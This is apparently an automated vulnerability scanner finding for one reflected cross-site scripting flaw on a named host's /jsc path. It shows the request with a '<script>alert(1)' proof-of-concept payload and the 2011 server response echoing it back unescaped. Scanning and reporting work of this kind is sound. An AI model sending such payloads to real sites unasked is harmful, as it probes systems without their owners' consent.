1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://jsc.madisonlogic |
Path: | /jsc |
GET /jsc?a79bd<script>alert(1)< Host: jsc.madisonlogic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Sun, 02 Jan 2011 16:31:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Sun, 02 Jan 2011 16:31:34 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 69 // Error: Unknown parameter a79bd<script>alert(1)< |